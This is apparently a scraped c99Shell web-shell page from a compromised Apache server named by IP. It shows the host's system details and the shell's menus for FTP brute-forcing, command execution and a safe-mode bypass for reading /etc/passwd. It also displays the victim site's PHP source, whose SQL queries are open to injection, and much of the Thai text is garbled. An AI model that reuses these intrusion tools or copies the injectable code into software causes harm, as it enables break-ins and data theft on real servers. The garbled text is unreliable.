110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/develop_person_depart/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php

session_start();



 if (session_is_registered("valid_user")&&session_is_registered("Priority"))

 {

include("../include/FunctionDB.php");

include("admin_menu.php");

 ConnectDB();

 $Username = $valid_user;

$sql = "SELECT * FROM personal_tb WHERE Username='$Username'";

$res = mysql_query($sql);

$rs = mysql_fetch_array($res);

$strSQL = "SELECT * FROM accessories_tb  GROUP By Faculty_code";

$result = mysql_query($strSQL); 

$num = mysql_num_rows($result );



?>

<meta http-equiv="Content-Type" content="text/html; charset=TIS-620"><table width="740" border="0" cellpadding="0" cellspacing="0">

    <tr>

        <td><br><fieldset>

            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="menu_manage.php" >Л№йТЛЕСЎ</a> </font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="AddAccName.php">аѕФиБўйНБЩЕ¤ГШАСі±м</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle">ўйНБЩЕ¤ГШАСі±мЛ№иЗВ§Т№</font></legend>

            <label><div align="center">

              <form id="form1" name="form1" method="post" action="">

                <table width="80%" border="0" align="center" cellpadding="0" cellspacing="0" style="background-color:#eeeeee; border:0px solid gray"size="12">

                  <tr bgcolor="#CCCCCC">

                    <td width="11%" height="23" bordercolor="#FFFFFF" bgcolor="#D2F49F" style="border:0px solid gray"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ЕУґСє</font></strong></div></td>

                    <td width="17%" bordercolor="#FFFFFF" bgcolor="#D2F49F" style="border:0px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ГЛСКЛ№иЗВ§Т№</font></strong></div></td>

                    <td width="47%" bordercolor="#FFFFFF" bgcolor="#D2F49F" style="border:0px solid gray"><div align="center"><strong><font size="2" face="Tahoma">Л№иЗВ§Т№</font></strong></div></td>

                    <td width="25%" bordercolor="#FFFFFF" bgcolor="#D2F49F" style="border:0px solid gray"><div align="center"><strong><font size="2" face="Tahoma">ЁУ№Т№ўйНБЩЕ·Сй§ЛБґ</font></strong></div></td>

                  </tr>

                  <?php

$i = 1;

 while($row = mysql_fetch_array($result))

 {



     if($count==0)

     {

?>

                  <tr >

                    <td align="center" bgcolor="#F7F7F7" ><strong><font color="#996600" size="2" face="Tahoma">

                      <?=$i?>

                    </font></strong></td>

                    <td align="center" bgcolor="#F7F7F7" ><div align="center"><strong><font color="#996600" size="2" face="Tahoma"> </font><font color="#990099" size="2" face="Tahoma"><a href="InstructorList.php?Budget_Year=<?=$row["Budget_Year"]?>"title="Click to see Detail" class="d"> </a></font><font color="#003366" size="2" face="Tahoma">

                        <?=$row["Faculty_code"]?>

                    </font></strong></div></td>

                    <td align="center" bgcolor="#F7F7F7" ><div align="left"><font size="2" face="Tahoma"><a href="AccList.php?Faculty_code=<?=$row["Faculty_code"]?>"title="Click to see Detail" class="d">

                        <?php

         $Faculty_code =  $row["Faculty_code"];

         $sql = "Select * From faculty_tb Where Faculty_code='$Faculty_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[Faculty_name] ";

         ?>

                    <strong><font color="#996600" size="2" face="Tahoma"> </font></strong></a><strong><font color="#996600" size="2" face="Tahoma"><a href="AccList.php?Acc_code=<?=$row["Acc_code"]?>"title="Click to see Detail" class="d"> </a></font></strong></font></div></td>

                    <td align="center" bgcolor="#F7F7F7" ><font size="2" face="Tahoma"><a href="AccList.php?Faculty_code=<?=$row["Faculty_code"]?>"title="Click to see Detail" class="d"> <strong><font color="#996600" size="2" face="Tahoma"> </font></strong></a><strong><font color="#996600" size="2" face="Tahoma"><a href="AccList.php?Acc_code=<?=$row["Acc_code"]?>"title="Click to see Detail" class="d"> </a></font><font size="4" face="Tahoma">

                      <?php 

                         $Faculty_code = $row["Faculty_code"];

                          $sql1 = "Select * From accessories_tb Where  Faculty_code='$Faculty_code' ";

                          $result1 = mysql_query($sql1) or die(" Error".mysql_error());

                          $rc1 = mysql_num_rows($result1);

                           if ( $rc1 == 0)

                              {

                              echo"<font face=\"Tahoma\" Size=\"2\" color=\"#FF0000\">";

                               echo"ВС§дБиўйНБЩЕ";

                               echo"</font>";

                              }

                            else if ($rc1  > 0) 

                              {

                              echo"<font face=\"Tahoma\" Size=\"2\" color=\"#006633\">";

                               echo"$rc1  <font face=\"Tahoma\" Size=\"2\" color=\"#000000\">ГТВЎТГ</font>";

                               echo"</font>";

                              } 

                          ?>

                    </font></strong></font></td>

                  </tr>

                  <?

    $count=1;

     }

else

{

?>

                  <tr>

                    <td align="center" bordercolor="#999966" bgcolor="#FFFFFF" ><strong><font color="#996600" size="2" face="Tahoma">

                      <?=$i?>

                    </font></strong></td>

                    <td height="18" align="center" bgcolor="#FFFFFF" ><div align="center"><strong><font color="#996600" size="2" face="Tahoma"> <a href="ProjectList.php?Budget_Year=<?=$row["Budget_year"]?>" title="Click to see Detail" class="d"></a> </font></strong><strong><font color="#990099" size="2" face="Tahoma"><a href="InstructorList.php?Budget_Year=<?=$row["Budget_Year"]?>"title="Click to see Detail" class="d"> </a></font><font color="#003366" size="2" face="Tahoma">

                        <?=$row["Faculty_code"]?>

                    </font><font color="#990099" size="2" face="Tahoma"><a href="InstructorList.php?Budget_Year=<?=$row["Budget_Year"]?>"title="Click to see Detail" class="d"> </a></font></strong></div></td>

                    <td align="center" bgcolor="#FFFFFF" ><div align="left"><font size="2" face="Tahoma"><a href="AccList.php?Faculty_code=<?=$row["Faculty_code"]?>"title="Click to see Detail" class="d">

                        <? 

         $Faculty_code =  $row["Faculty_code"];

         $sql = "Select * From faculty_tb Where Faculty_code='$Faculty_code'";

          $result1 = mysql_query($sql) or die("Error".mysql_error());

          $rss = mysql_fetch_array($result1);

          echo "$rss[Faculty_name] ";

         ?>

                    </a></font></div></td>

                    <td align="center" bgcolor="#FFFFFF" ><div align="center"><font size="2" face="Tahoma"><a href="InstructorList.php?Budget_Year=<?=$row["Budget_Year"]?>"title="Click to see Detail" class="d"> </a><strong><font size="4" face="Tahoma">

                        <?php 

                         $Faculty_code = $row["Faculty_code"];

                          $sql1 = "Select * From accessories_tb Where  Faculty_code='$Faculty_code' ";

                          $result1 = mysql_query($sql1) or die(" Error".mysql_error());

                          $rc1 = mysql_num_rows($result1);

                           if ( $rc1 == 0)

                              {

                              echo"<font face=\"Tahoma\" Size=\"2\" color=\"#FF0000\">";

                               echo"ВС§дБиўйНБЩЕ";

                               echo"</font>";

                              }

                            else if ($rc1  > 0) 

                              {

                              echo"<font face=\"Tahoma\" Size=\"2\" color=\"#006633\">";

                               echo"$rc1  <font face=\"Tahoma\" Size=\"2\" color=\"#000000\">ГТВЎТГ</font>";

                               echo"</font>";

                              } 

                          ?>

                    </font></strong></font></div></td>

                  </tr>

                  <?

$count=0;

}

$i++;

 }    



?>

                  <tr>

                    <td height="25" colspan="4" align="center" bgcolor="#D2F49F"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#993333" size="2" face="Tahoma"> <? echo $num ?></font><font color="#000000" size="2" face="Tahoma"> Л№иЗВ§Т№</font></strong></div></td>

                  </tr>

                </table>

              </form>

              <br>

              <br>

            </div></label>

        </fieldset><br>

        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>ЛБТВаЛµШ :</b> гЄйаБТКм¤ЕФЎ·ХиЄЧиН<br>

        </font></td>

    </tr>

</table>

<?php 

    }

else

{

       echo"<meta http-equiv=\"refresh\" content=\"3;URL=../login.php\">\n";

       echo"Please Login ";

}

?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: